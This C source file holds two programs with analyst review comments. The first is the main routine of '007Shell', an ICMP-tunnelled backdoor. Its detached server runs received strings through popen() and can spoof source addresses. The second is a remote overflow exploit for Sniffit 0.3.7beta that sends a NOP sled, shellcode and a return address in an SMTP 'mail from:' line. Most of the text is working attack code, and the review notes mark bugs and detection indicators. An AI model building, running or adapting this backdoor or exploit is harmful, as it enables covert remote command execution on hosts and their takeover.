/*
 * Entry point of a two-mode tool that carries a remote command channel
 * through the ICMP_send()/ICMP_recv() helpers (defined elsewhere in the file).
 *
 *   -c         client: reads command lines from stdin and sends them to -h
 *   -s         server: detaches, runs each received string through popen()
 *              and sends the output back to the sender
 *   -h <host>  server address for the client
 *   -S <host>  source address handed to ICMP_sp_send() (client only)
 *
 * Review notes for analysts (all visible in this function):
 *   - The server passes network-supplied bytes straight to popen(). No
 *     authentication or validation is done here; whether ICMP_recv() filters
 *     anything is not visible from this view.
 *   - In server mode argv[0] is overwritten with a fixed banner string.
 *   - Every error path exits with status 0 and the normal fall-through exits
 *     with 1, so the exit status cannot be used to tell success from failure.
 *   - `i` is never used; `n` and `ret` are written but never read.
 */
int main(int argc, char **argv)
{
    char data[MAXMESG] ;
    char recvdata[MAXMESG+BUFFSIZE] ;
    char senddata[MAXMESG+BUFFSIZE] ;
    int opt, off = 0, n, i ;
    int srvr = 0, clnt = 0 ;
    int pid, ret ;
    u_long hostaddress, cliaddress ;
    char buf[BUFFSIZE] ;
    char buf2[BUFFSIZE] ;
    FILE *job ;

    if (argc < 2) usage(argv[0]);

    while ((opt = getopt(argc, argv, "sch:S:")) != EOF) {
        switch(opt) {
        case 's':
            srvr++;
            break;
        case 'c':
            clnt++;
            break;
        case 'h':
            hostaddress = nameResolve(optarg);
            break;
        case 'S':
            ip_spoof = YEAH;
            spoof_addr = nameResolve(optarg);
            break;
        default:
            usage(argv[0]);
        }
    }

    /*
     * NOTE(review): strcpy() into argv[0] is unbounded; the banner is longer
     * than most program names, so the copy can run past the original string.
     * The fixed text is a stable indicator wherever process listings are
     * backed by the argv area (platform dependent, confirm on the target OS).
     */
    if (srvr) strcpy(argv[0], "007Shell v.1.0 - Good Luck James ...");

    /*
     * NOTE(review): hostaddress has no initializer, so without -h this test
     * reads an indeterminate value.
     */
    if (!hostaddress && clnt) {
        fprintf(stderr, "\n\033[0;5;31mYou must specify the server address\033[0m\n\n");
        exit(0);
    }

    if (clnt && !srvr) {
        /* Client: interactive prompt, one message per input line. */
        printf("\033[0;32m007Shell v.1.0 - Let's Dig Covert !\033[m\n");
        while (!ferror(stdin) && !feof(stdin)) {
            bzero(senddata, sizeof(senddata));
            bzero(recvdata, sizeof(recvdata));
            printf("\033[0;32m[covert@007Shell]# \033[0m");
            if (fgets(data, MAXMESG, stdin) == NULL) break;
            /*
             * Drops the last character, assumed to be the newline.
             * NOTE(review): if the line starts with a NUL byte strlen() is 0
             * and this writes data[-1]; a line without a trailing newline
             * loses its last real character instead.
             */
            data[strlen(data)-1] = 0;
            /* A line containing OFFLINE is still sent, then ends the session. */
            if(strstr(data, OFFLINE)) off = 1 ;
            strcat(senddata, data);

            if(ip_spoof == NOPE) {
                if( ICMP_send(senddata, strlen(senddata), hostaddress, 0, 0) < 0) {
                    perror("\033[0;5;31mTunnel_Send: \033[0m");
                    exit(0);
                }
                if (off && clnt) {
                    ICMP_reset();
                    printf("\033[0;32mSee ya Covert, James ...\033[0m\n");
                    exit(0);
                }
                /* Print replies until ICMP_recv() returns the -666 sentinel. */
                while(1) {
                    /*
                     * NOTE(review): clears only up to the first NUL, not the
                     * whole buffer; termination of the printed string relies
                     * on ICMP_recv() (not visible here).
                     */
                    memset(recvdata, '\0', strlen(recvdata));
                    if((n=ICMP_recv(recvdata, MAXMESG, REPLY)) != -666) {
                        printf("%s", recvdata);
                    }
                    else break;
                }
            }

            /* With -S the message is sent via ICMP_sp_send() and no reply is read. */
            if(ip_spoof == YEAH) {
                if( ICMP_sp_send(senddata, strlen(senddata), hostaddress, spoof_addr) < 0) {
                    perror("\033[0;5;31mTunnel_Send: \033[0m");
                    exit(0);
                }
                if (off && clnt) {
                    ICMP_reset();
                    printf("\033[0;32mSee ya Covert, James ...\033[0m\n");
                    exit(0);
                }
            }
        }
    }
    else if(srvr && !clnt) {
        /*
         * Server: the parent prints a banner and exits, the child carries on
         * in a new session. Return values of fork() (-1 is treated as the
         * parent), setsid() and chdir() are not checked; umask(0) removes
         * every permission restriction on files created by spawned commands.
         */
        pid = fork();
        if (pid != 0) {
            printf("\033[0;32m007Shell v.1.0 - Let's Go Covert !\033[0m\n");
            exit(0);
        }
        setsid();
        chdir(ROOTDIR);
        umask(0);

        /* `off` is never set in this branch; the loop ends only through exit(). */
        while(!off) {
            ret = 0;
            bzero(senddata, 
                  sizeof(senddata));
            bzero(recvdata, sizeof(recvdata));
            if((n=ICMP_recv(recvdata, MAXMESG, 0)) < 0) {
                perror("\033[0;5;31mTunnel_Recv: \033[0m");
                exit(0);
            }
            /* presumably clisrc is filled in by ICMP_recv() with the sender; verify there */
            cliaddress = clisrc.sin_addr.s_addr;
            if(strstr(recvdata, OFFLINE)) {
                ICMP_reset();
                exit(0);
            }
            /*
             * SECURITY: the received payload is executed through the shell as
             * is. Hosts running this show shell children under a process with
             * no controlling terminal, and ICMP payloads carrying command
             * text and command output.
             */
            if (!(job = popen(recvdata, "r"))) {
                perror("\033[0;5;31Popen: \033[0m");
                exit(0);
            }
            /* One reply message per line of command output. */
            while(fgets(buf, BUFFSIZE-1, job)) {
                ret++;
                /* Copies the whole buffer, including stale bytes after the NUL. */
                bcopy(buf, buf2, BUFFSIZE);
                ICMP_send(buf2, strlen(buf2), cliaddress, REPLY, 0);
            }
            /* Empty message flagged LAST, presumably the end-of-output marker. */
            ICMP_send("", 0, cliaddress, 0, LAST);
            pclose(job);
            fflush(NULL);
        }
    }

    ICMP_reset();
    exit(1);
}
/*
 * Proof-of-concept client for a remote overflow in Sniffit <= 0.3.7beta
 * (version taken from the banner printed below). It connects to TCP port 25
 * on the host given as argv[1] and writes a single "mail from:" line whose
 * argument is an oversized binary buffer.
 *
 * Review notes for defenders (all visible in this function):
 *   - Wire indicator: a "mail from:" string followed by a long run of 0x90
 *     bytes and other non-printable data, far longer than any valid
 *     reverse-path. The client never reads the server greeting and sends no
 *     CRLF.
 *   - `cmd` is not initialized before the first strncat(), and `buff` gets no
 *     explicit terminator, so both strlen() calls depend on whatever bytes
 *     are on the stack. The data actually sent can carry a garbage prefix and
 *     vary in length; signatures should not anchor on offset 0 or on an exact
 *     size.
 *   - The vulnerable code path in the target is not shown here; the
 *     mitigation this file supports is running a Sniffit release newer than
 *     the one named in the banner.
 */
int main(int argc,char **argv)
{
    char buff[LENGTH+ALIGNOP+1];
    char cmd[610];
    long addr;
    unsigned long sp;
    int offset=OFFSET;
    int i, x;
    int sock;
    struct sockaddr_in sin;

    if(argc<2) {
        fprintf(stderr, "Usage: %s <sniffit host>\n", argv[0]);
        exit(0);
    }

    /* Target address is the compile-time RET constant minus OFFSET. */
    sp=(unsigned long) RET;
    addr=sp-offset;

    /* Buffer layout: 0x90 filler (x86 NOP), then shellcode[], then addr repeated. */
    for(i=0;i<120-ALIGNOP;i++)
        buff[i]=0x90;
    for(x=0; x<strlen(shellcode); i++, x++)
        buff[i]=shellcode[x];
    /*
     * addr is stored least-significant byte first.
     * NOTE(review): the last iteration writes buff[i+3] with i up to
     * LENGTH-1; whether that stays inside buff depends on ALIGNOP, which is
     * defined outside this view.
     */
    for(i-=1 ; i<LENGTH; i+=4) {
        buff[i ] = addr & 0x000000ff;
        buff[i+1] = (addr & 0x0000ff00) >> 8;
        buff[i+2] = (addr & 0x00ff0000) >> 16;
        buff[i+3] = (addr & 0xff000000) >> 24;
    }

    printf("\nSniffit <=0.3.7beta Linux/x86 Remote Exploit\n");
    printf("by FuSyS [S0ftpj|BFi] - http://www.s0ftpj.org\n\n");

    /* Plain TCP connection to the SMTP port of the named host. */
    memset(&sin,0,sizeof(sin));
    sin.sin_family=AF_INET;
    sin.sin_port=htons(25);
    sin.sin_addr.s_addr=nameResolve(argv[1]);

    printf("Connecting to %s ...\n", argv[1]);

    /* Failures exit with status 0, so callers cannot detect them. */
    if((sock=socket(AF_INET,SOCK_STREAM,0))<0) {
        printf("Can't create socket\n");
        exit(0);
    }
    if(connect(sock,(struct sockaddr *)&sin,sizeof(sin))<0) {
        printf("Can't connect to Sniffit Server\n");
        exit(0);
    }

    printf("Injecting ShellCode ...\n");

    /*
     * NOTE(review): appends to an uninitialized cmd[610] with a bound taken
     * from the source length rather than the destination size; the result of
     * write() is ignored and the socket is never closed.
     */
    strncat(cmd, "mail from:", 10);
    strncat(cmd, buff, strlen(buff));
    write(sock, cmd, strlen(cmd));

    printf("Done!\n\n");
    return(0);
}